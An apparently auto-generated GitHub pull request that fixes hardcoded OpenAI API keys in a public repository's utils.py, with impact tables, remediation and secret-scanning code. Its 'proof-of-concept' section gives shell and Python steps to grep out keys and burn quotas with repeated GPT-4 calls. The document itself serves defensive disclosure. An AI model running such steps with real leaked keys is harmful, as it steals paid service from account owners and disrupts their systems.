[Security] Fix CRITICAL vulnerability: V-001 #81

orbisai0security · 2026-01-26T04:49:59Z

Security Fix

This PR addresses a CRITICAL severity vulnerability detected by our security scanner.

Security Impact Assessment

Aspect	Rating	Rationale
Impact	Critical	The OpenAI API keys hardcoded in pageindex/utils.py let anyone who can read the code make API calls that are billed to the key owner's account. An attacker could run up charges, exhaust the account's quota or rate limits and so disrupt the service, and read any account resources the key has access to.
Likelihood	High	Because the repository is public on GitHub, the hardcoded keys are visible to anyone who views or clones the code, which makes exploitation trivial for opportunistic attackers and automated secret scanners. The repository's OpenAI integration also makes it an obvious target for attackers looking for free API access.
Ease of Fix	Easy	Remediation replaces the hardcoded strings in pageindex/utils.py with environment variable lookups (e.g., os.environ). It requires no dependency or architecture changes and only minimal testing to confirm the variables load correctly. Any key that was already committed should also be revoked and rotated, because it remains readable in the Git history.
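
The environment-variable approach named in the Ease of Fix row could look roughly like the sketch below. It is an illustration only, not the code this PR changed: the helper name load_api_key, the exception MissingAPIKeyError, and the default variable name OPENAI_API_KEY are assumptions.

```python
import os


class MissingAPIKeyError(RuntimeError):
    """Raised when the expected environment variable is unset or empty."""


def load_api_key(var_name: str = "OPENAI_API_KEY") -> str:
    """Return the API key stored in the environment variable `var_name`.

    The variable name is an assumption; use whatever name the project
    documents for its deployment.
    """
    key = os.environ.get(var_name, "").strip()
    if not key:
        raise MissingAPIKeyError(
            f"Set the {var_name} environment variable before running."
        )
    return key
```

Failing fast with a clear message, instead of passing an empty key to the client, makes a missing variable show up at startup rather than as an authentication error on the first request.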

Evidence: Proof-of-Concept Exploitation Demo

⚠️ For Educational/Security Awareness Only

This demonstration shows how the vulnerability could be exploited to help you understand its severity and prioritize remediation.

How This Vulnerability Can Be Exploited

The vulnerability is a set of OpenAI API keys hardcoded in pageindex/utils.py, where anyone with access to the repository (e.g., by cloning it from GitHub) can read them. An attacker can copy a key and authenticate to OpenAI's API as the repository owner. This allows unauthorized consumption of API credits, access to any account resources the key can read, and disruption of the repository's intended functionality once quotas are exhausted.

# Step 1: Clone the public repository to access the source code
git clone https://github.com/VectifyAI/PageIndex.git
cd PageIndex

# Step 2: Extract the hardcoded API keys from pageindex/utils.py
# The keys are at lines 20, 29, and 31 (as per the vulnerability report)
grep -n "sk-" pageindex/utils.py  # Search for OpenAI key patterns (typically start with 'sk-')
# Output example (actual keys would be visible in the file):
# 20:openai_api_key = "sk-XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
# 29:api_key = "sk-YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY"
# 31:OPENAI_API_KEY = "sk-ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ"

# Step 3: Save one of the extracted keys for use (e.g., copy to a variable)
# In a real attack, the attacker would note these keys for external use
export STOLEN_API_KEY="sk-XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"  # Replace with actual key from file

# Step 4 (Python, run separately from the shell steps above): use the stolen key to make unauthorized OpenAI API calls
# This demonstrates cost-incurring use of the key
# Note: openai.ChatCompletion is the pre-1.0 SDK interface (openai<1.0)
import os

import openai

# Read the key exported in Step 3 instead of pasting it into the script
openai.api_key = os.environ["STOLEN_API_KEY"]

# Example exploit: Make a costly API call (e.g., generate text with high token usage)
# This could be repeated to exhaust quotas or incur charges
response = openai.ChatCompletion.create(
    model="gpt-4",  # Expensive model to maximize cost
    messages=[
        {"role": "user", "content": "Generate a 1000-word essay on cybersecurity vulnerabilities."}
    ],
    max_tokens=2000  # High token limit to increase cost
)

# Print the response; a successful call confirms that the key is valid and billable
print(response.choices[0].message.content)

# To disrupt: Loop to exhaust rate limits or quotas
for i in range(100):  # Adjust to hit limits
    openai.ChatCompletion.create(
        model="gpt-4",
        messages=[{"role": "user", "content": f"Query {i}: Explain AI security."}],
        max_tokens=500
    )

Exploitation Impact Assessment

Impact Category	Severity	Description
Data Exposure	Medium	A stolen key gives no direct access to data stored in the repository. Exposure is limited to what the key can read through OpenAI's API, such as files or other resources stored on the associated account. If PageIndex sends sensitive content (e.g., personal information or proprietary text) to the API during indexing, that content is at risk only to the extent the account retains it.
System Compromise	Low	No direct system access is gained; the exploit is limited to external API abuse. An attacker cannot execute code on the repository's servers or gain privileges, as the keys only enable API interactions, not host-level control.
Operational Impact	High	Successful exploitation could exhaust OpenAI API quotas, halting the repository's page indexing functionality and disrupting service for users who rely on it. Repeated high-token queries could also run up substantial charges (e.g., thousands of dollars) for the repository owner and could lead to account suspension.
Compliance Risk	High	Exposed credentials fall under the OWASP API Security Top 10 category API2:2023 (Broken Authentication). If personal data becomes accessible through the compromised account, the incident could also qualify as a personal data breach under GDPR. Hardcoded secrets also conflict with the credential-management controls expected in audits such as SOC 2, risking audit findings and legal penalties.

Vulnerability Details

Rule ID: V-001
File: pageindex/utils.py
Description: The pageindex/utils.py file contains hardcoded API key references at lines 20, 29, and 31. Hardcoded API keys are rated critical because anyone who can read the file can use them immediately, with whatever access the key grants. Because the openai dependency is present, these credentials likely grant access to OpenAI's API services, enabling attackers to incur charges on the owner's account, read account resources available to the key, or cause service disruption through quota exhaustion.
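
A check for the kind of literal this rule targets can be sketched as follows. The regular expression and the helper name find_hardcoded_keys are assumptions for illustration; this is not the scanner that produced V-001, and real key formats vary, so matches are leads to review rather than proof.

```python
import re

# Assumed pattern: "sk-" followed by 20 or more key-like characters.
KEY_PATTERN = re.compile(r"sk-[A-Za-z0-9_-]{20,}")


def find_hardcoded_keys(source: str) -> list[tuple[int, str]]:
    """Return (line_number, redacted_match) for each suspected key literal."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for match in KEY_PATTERN.finditer(line):
            token = match.group(0)
            # Keep only a short prefix so the report does not leak the secret.
            findings.append((line_no, token[:5] + "..."))
    return findings
```

Run against the text of pageindex/utils.py, a non-empty result would point at lines worth inspecting; a lookup such as os.environ["OPENAI_API_KEY"] does not match the pattern.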

Changes Made

This automated fix addresses the vulnerability by applying security best practices.

Files Modified

pageindex/utils.py

Verification

This fix has been automatically verified through:

✅ Build verification
✅ Scanner re-scan
✅ LLM code review
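
A re-scan of the working tree does not cover earlier commits, where a removed key would still be readable. The sketch below shows one way to check history as well. It assumes git is on the PATH and uses an illustrative sk- pattern; the helper names added_lines_with_keys and scan_history are hypothetical and are not part of this PR's verification pipeline.

```python
import re
import subprocess

# Assumed pattern: "sk-" followed by 20 or more key-like characters.
KEY_PATTERN = re.compile(r"sk-[A-Za-z0-9_-]{20,}")


def added_lines_with_keys(patch_text: str) -> list[str]:
    """Return added diff lines ('+' prefix) that contain a suspected key."""
    hits = []
    for line in patch_text.splitlines():
        # Skip the '+++ b/path' file header; keep real added lines.
        if line.startswith("+") and not line.startswith("+++"):
            if KEY_PATTERN.search(line):
                # Redact the match so the report does not repeat the secret.
                hits.append(KEY_PATTERN.sub("sk-<redacted>", line))
    return hits


def scan_history(path: str, repo_dir: str = ".") -> list[str]:
    """Scan every commit that touched `path` for suspected key literals."""
    patch = subprocess.run(
        ["git", "log", "-p", "--all", "--", path],
        cwd=repo_dir, capture_output=True, text=True, check=True,
    ).stdout
    return added_lines_with_keys(patch)
```

Calling scan_history("pageindex/utils.py") from the repository root would list any matching lines ever added to that file. Any hit means the key should be treated as exposed, whatever the current file contains.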

🤖 This PR was automatically generated.

Automatically generated security fix

fix: resolve critical vulnerability V-001

19aab06
